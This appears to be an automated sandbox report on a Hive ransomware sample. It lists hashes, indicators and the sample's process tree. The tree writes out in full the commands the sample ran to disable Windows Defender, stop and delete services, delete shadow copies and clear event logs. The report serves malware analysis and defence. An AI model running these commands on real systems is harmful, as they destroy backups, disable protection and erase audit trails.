Analysis
-
max time kernel
142s -
max time network
128s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
03-08-2021 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a2112.exe
Resource
win7v20210410
General
-
Target
a2112.exe
-
Size
919KB
-
MD5
4cd42e7aac7f89edf5764b699b2800d0
-
SHA1
f309daa9650485d6ef6ceeccdc8c014d425a00fd
-
SHA256
67ab2abe18b060275763e1d0c73d27c1e61b69097232ed9d048d41760a4533ef
-
SHA512
0dcf0a9f4b15a355c3da11fbcd2276e9d96bd7b767c3cc2cdf17e3fc0b47483f3ef7f6953fd0ca232c3e9a8603be34b0f6c9d41eaac32ffff66755d8d2400440
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1064 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 632 bcdedit.exe 1168 bcdedit.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\MeasureUpdate.tif => C:\Users\Admin\Pictures\MeasureUpdate.tif.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u64cKDYeq4zDutBH4BfhF0Z.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\MeasureUpdate.tif.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u64cKDYeq4zDutBH4BfhF0Z.w2tnk a2112.exe File renamed C:\Users\Admin\Pictures\MountTrace.crw => C:\Users\Admin\Pictures\MountTrace.crw.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u4i73YNN7Xtco8oheZfs3Q9.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\MountTrace.crw.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u4i73YNN7Xtco8oheZfs3Q9.w2tnk a2112.exe File renamed C:\Users\Admin\Pictures\PushProtect.tiff => C:\Users\Admin\Pictures\PushProtect.tiff.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6i5TGpSULgUHkMX0sMOxFz.w2tnk a2112.exe File renamed C:\Users\Admin\Pictures\UnprotectConvert.png => C:\Users\Admin\Pictures\UnprotectConvert.png.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6DkzluVkR6Eq0bABgi3W8K.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\UnprotectConvert.png.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6DkzluVkR6Eq0bABgi3W8K.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\PushProtect.tiff a2112.exe File opened for modification C:\Users\Admin\Pictures\PushProtect.tiff.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6i5TGpSULgUHkMX0sMOxFz.w2tnk a2112.exe -
Stops running service(s) 3 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u5aQgqaoOseEVRdrpApWBcu.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6rTu1RGIU3Qv3yEA6EROlg.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7JIlXvNWpAFj31GaoinzlI.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14997_.GIF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7s6415eUzrTr0LBHE4F3pk.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293828.WMF a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18214_.WMF a2112.exe File created C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u4MiMatJHe_H3Ki6mGMcAwq.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar a2112.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png a2112.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo a2112.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF a2112.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama a2112.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg.png a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6qdratrA4nAa1DKTo3-r02.w2tnk a2112.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u53F2L-mQGdWis9u0-2zzsn.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7Qb-Pjbb8kIevu9W2MKZw7.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FINCL_01.MID.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u5Hrv24Cc4UCHoOt_D4iKtA.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar a2112.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique a2112.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\settings.js a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00394_.WMF a2112.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7Zg9wO6ot4Kw65dlxqFEAv.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL075.XML.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u68IrLq-w4pSk_PchJiHHhZ.w2tnk a2112.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14677_.GIF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u674Mnw0l-kcgPXkkMrR341.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u6UabEGvi4MBPzDpnK00zwB.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u4gGsgURBbJTpg0CN1L_N0T.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14753_.GIF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u5-5DNRhqWJFq280YPNoNBo.w2tnk a2112.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP a2112.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u57kk45hf2RPMD7nzJsYwJ0.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u67nH0CBNtDS8tmUCl_R-47.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u79x7fczeyxY2E1xWfckGxi.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7TQYS5n7_afmKllcQz1mkF.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u5GF-jlTZDlIy5-fSeAKmo6.w2tnk a2112.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf a2112.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7x-iuWKGreAppUCwRY2-xg.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7UzNfreUXBbAWUzj0e0Ph1.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMARQ.DPV.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u4bWy60rNpVJxt8QwxJSUVU.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF a2112.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png a2112.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u5g3FSguXZADZ15aeW6cVJ5.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF a2112.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF a2112.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7OmUOCYF_6FOJxLf_fFFQ4.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.YCGOr8OKUvVDOVsbzhPuN7zUcfVjtcHtF3cEzeMa7u7IIImZTCXMMOX0ZNR8cQJe.w2tnk a2112.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1904 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1420 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 540 powershell.exe 540 powershell.exe 1932 powershell.exe 1932 powershell.exe 1104 a2112.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1592 wevtutil.exe Token: SeBackupPrivilege 1592 wevtutil.exe Token: SeSecurityPrivilege 1200 wevtutil.exe Token: SeBackupPrivilege 1200 wevtutil.exe Token: SeSecurityPrivilege 1232 wevtutil.exe Token: SeBackupPrivilege 1232 wevtutil.exe Token: SeIncreaseQuotaPrivilege 804 WMIC.exe Token: SeSecurityPrivilege 804 WMIC.exe Token: SeTakeOwnershipPrivilege 804 WMIC.exe Token: SeLoadDriverPrivilege 804 WMIC.exe Token: SeSystemProfilePrivilege 804 WMIC.exe Token: SeSystemtimePrivilege 804 WMIC.exe Token: SeProfSingleProcessPrivilege 804 WMIC.exe Token: SeIncBasePriorityPrivilege 804 WMIC.exe Token: SeCreatePagefilePrivilege 804 WMIC.exe Token: SeBackupPrivilege 804 WMIC.exe Token: SeRestorePrivilege 804 WMIC.exe Token: SeShutdownPrivilege 804 WMIC.exe Token: SeDebugPrivilege 804 WMIC.exe Token: SeSystemEnvironmentPrivilege 804 WMIC.exe Token: SeRemoteShutdownPrivilege 804 WMIC.exe Token: SeUndockPrivilege 804 WMIC.exe Token: SeManageVolumePrivilege 804 WMIC.exe Token: 33 804 WMIC.exe Token: 34 804 WMIC.exe Token: 35 804 WMIC.exe Token: SeIncreaseQuotaPrivilege 1856 WMIC.exe Token: SeSecurityPrivilege 1856 WMIC.exe Token: SeTakeOwnershipPrivilege 1856 WMIC.exe Token: SeLoadDriverPrivilege 1856 WMIC.exe Token: SeSystemProfilePrivilege 1856 WMIC.exe Token: SeSystemtimePrivilege 1856 WMIC.exe Token: SeProfSingleProcessPrivilege 1856 WMIC.exe Token: SeIncBasePriorityPrivilege 1856 WMIC.exe Token: SeCreatePagefilePrivilege 1856 WMIC.exe Token: SeBackupPrivilege 1856 WMIC.exe Token: SeRestorePrivilege 1856 WMIC.exe Token: SeShutdownPrivilege 1856 WMIC.exe Token: SeDebugPrivilege 1856 WMIC.exe Token: SeSystemEnvironmentPrivilege 1856 WMIC.exe Token: SeRemoteShutdownPrivilege 1856 WMIC.exe Token: SeUndockPrivilege 1856 WMIC.exe Token: SeManageVolumePrivilege 1856 WMIC.exe Token: 33 1856 WMIC.exe Token: 34 1856 WMIC.exe Token: 35 1856 WMIC.exe Token: SeIncreaseQuotaPrivilege 1856 WMIC.exe Token: SeSecurityPrivilege 1856 WMIC.exe Token: SeTakeOwnershipPrivilege 1856 WMIC.exe Token: SeLoadDriverPrivilege 1856 WMIC.exe Token: SeSystemProfilePrivilege 1856 WMIC.exe Token: SeSystemtimePrivilege 1856 WMIC.exe Token: SeProfSingleProcessPrivilege 1856 WMIC.exe Token: SeIncBasePriorityPrivilege 1856 WMIC.exe Token: SeCreatePagefilePrivilege 1856 WMIC.exe Token: SeBackupPrivilege 1856 WMIC.exe Token: SeRestorePrivilege 1856 WMIC.exe Token: SeShutdownPrivilege 1856 WMIC.exe Token: SeDebugPrivilege 1856 WMIC.exe Token: SeSystemEnvironmentPrivilege 1856 WMIC.exe Token: SeRemoteShutdownPrivilege 1856 WMIC.exe Token: SeUndockPrivilege 1856 WMIC.exe Token: SeManageVolumePrivilege 1856 WMIC.exe Token: 33 1856 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1104 wrote to memory of 840 1104 a2112.exe 30 PID 1104 wrote to memory of 840 1104 a2112.exe 30 PID 1104 wrote to memory of 840 1104 a2112.exe 30 PID 1104 wrote to memory of 848 1104 a2112.exe 31 PID 1104 wrote to memory of 848 1104 a2112.exe 31 PID 1104 wrote to memory of 848 1104 a2112.exe 31 PID 848 wrote to memory of 1676 848 cmd.exe 32 PID 848 wrote to memory of 1676 848 cmd.exe 32 PID 848 wrote to memory of 1676 848 cmd.exe 32 PID 848 wrote to memory of 760 848 cmd.exe 33 PID 848 wrote to memory of 760 848 cmd.exe 33 PID 848 wrote to memory of 760 848 cmd.exe 33 PID 848 wrote to memory of 656 848 cmd.exe 34 PID 848 wrote to memory of 656 848 cmd.exe 34 PID 848 wrote to memory of 656 848 cmd.exe 34 PID 848 wrote to memory of 784 848 cmd.exe 35 PID 848 wrote to memory of 784 848 cmd.exe 35 PID 848 wrote to memory of 784 848 cmd.exe 35 PID 848 wrote to memory of 288 848 cmd.exe 36 PID 848 wrote to memory of 288 848 cmd.exe 36 PID 848 wrote to memory of 288 848 cmd.exe 36 PID 848 wrote to memory of 1156 848 cmd.exe 37 PID 848 wrote to memory of 1156 848 cmd.exe 37 PID 848 wrote to memory of 1156 848 cmd.exe 37 PID 848 wrote to memory of 932 848 cmd.exe 38 PID 848 wrote to memory of 932 848 cmd.exe 38 PID 848 wrote to memory of 932 848 cmd.exe 38 PID 848 wrote to memory of 292 848 cmd.exe 39 PID 848 wrote to memory of 292 848 cmd.exe 39 PID 848 wrote to memory of 292 848 cmd.exe 39 PID 848 wrote to memory of 1168 848 cmd.exe 40 PID 848 wrote to memory of 1168 848 cmd.exe 40 PID 848 wrote to memory of 1168 848 cmd.exe 40 PID 848 wrote to memory of 964 848 cmd.exe 41 PID 848 wrote to memory of 964 848 cmd.exe 41 PID 848 wrote to memory of 964 848 cmd.exe 41 PID 848 wrote to memory of 752 848 cmd.exe 42 PID 848 wrote to memory of 752 848 cmd.exe 42 PID 848 wrote to memory of 752 848 cmd.exe 42 PID 848 wrote to memory of 112 848 cmd.exe 43 PID 848 wrote to memory of 112 848 cmd.exe 43 PID 848 wrote to memory of 112 848 cmd.exe 43 PID 848 wrote to memory of 1492 848 cmd.exe 44 PID 848 wrote to memory of 1492 848 cmd.exe 44 PID 848 wrote to memory of 1492 848 cmd.exe 44 PID 848 wrote to memory of 1588 848 cmd.exe 45 PID 848 wrote to memory of 1588 848 cmd.exe 45 PID 848 wrote to memory of 1588 848 cmd.exe 45 PID 848 wrote to memory of 1396 848 cmd.exe 46 PID 848 wrote to memory of 1396 848 cmd.exe 46 PID 848 wrote to memory of 1396 848 cmd.exe 46 PID 848 wrote to memory of 692 848 cmd.exe 47 PID 848 wrote to memory of 692 848 cmd.exe 47 PID 848 wrote to memory of 692 848 cmd.exe 47 PID 848 wrote to memory of 1252 848 cmd.exe 48 PID 848 wrote to memory of 1252 848 cmd.exe 48 PID 848 wrote to memory of 1252 848 cmd.exe 48 PID 848 wrote to memory of 1736 848 cmd.exe 49 PID 848 wrote to memory of 1736 848 cmd.exe 49 PID 848 wrote to memory of 1736 848 cmd.exe 49 PID 848 wrote to memory of 1844 848 cmd.exe 50 PID 848 wrote to memory of 1844 848 cmd.exe 50 PID 848 wrote to memory of 1844 848 cmd.exe 50 PID 848 wrote to memory of 2004 848 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2112.exe"C:\Users\Admin\AppData\Local\Temp\a2112.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\cmd.execmd /c bB9B1encv6.bat >NUL 2>NUL2⤵PID:840
-
-
C:\Windows\system32\cmd.execmd /c bB9B1encv6.bat >NUL 2>NUL2⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\system32\sc.exesc stop "LanmanWorkstation"3⤵PID:1676
-
-
C:\Windows\system32\sc.exesc stop "NetMsmqActivator"3⤵PID:760
-
-
C:\Windows\system32\sc.exesc stop "SamSs"3⤵PID:656
-
-
C:\Windows\system32\sc.exesc stop "SDRSVC"3⤵PID:784
-
-
C:\Windows\system32\sc.exesc stop "SstpSvc"3⤵PID:288
-
-
C:\Windows\system32\sc.exesc stop "UI0Detect"3⤵PID:1156
-
-
C:\Windows\system32\sc.exesc stop "VSS"3⤵PID:932
-
-
C:\Windows\system32\sc.exesc stop "wbengine"3⤵PID:292
-
-
C:\Windows\system32\sc.exesc stop "WebClient"3⤵PID:1168
-
-
C:\Windows\system32\sc.exesc delete "LanmanWorkstation"3⤵PID:964
-
-
C:\Windows\system32\sc.exesc delete "NetMsmqActivator"3⤵PID:752
-
-
C:\Windows\system32\sc.exesc delete "SamSs"3⤵PID:112
-
-
C:\Windows\system32\sc.exesc delete "SDRSVC"3⤵PID:1492
-
-
C:\Windows\system32\sc.exesc delete "SstpSvc"3⤵PID:1588
-
-
C:\Windows\system32\sc.exesc delete "UI0Detect"3⤵PID:1396
-
-
C:\Windows\system32\sc.exesc delete "VSS"3⤵PID:692
-
-
C:\Windows\system32\sc.exesc delete "wbengine"3⤵PID:1252
-
-
C:\Windows\system32\sc.exesc delete "WebClient"3⤵PID:1736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:1844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:2004
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1576
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:1696
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵PID:1360
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵PID:1200
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵PID:1420
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵PID:844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵PID:1636
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:1704
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:764
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:240
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f3⤵PID:656
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:268
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1120
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:1584
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:1620
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:904
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:828
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:1064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f3⤵PID:524
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f3⤵PID:752
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f3⤵PID:584
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:552
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1968
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1588
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1924
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1332
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1916
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1252
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:344
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:872
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1904
-
-
C:\Windows\system32\wevtutil.exewevtutil cl system3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Windows\system32\wevtutil.exewevtutil cl security3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\system32\wevtutil.exewevtutil cl application3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
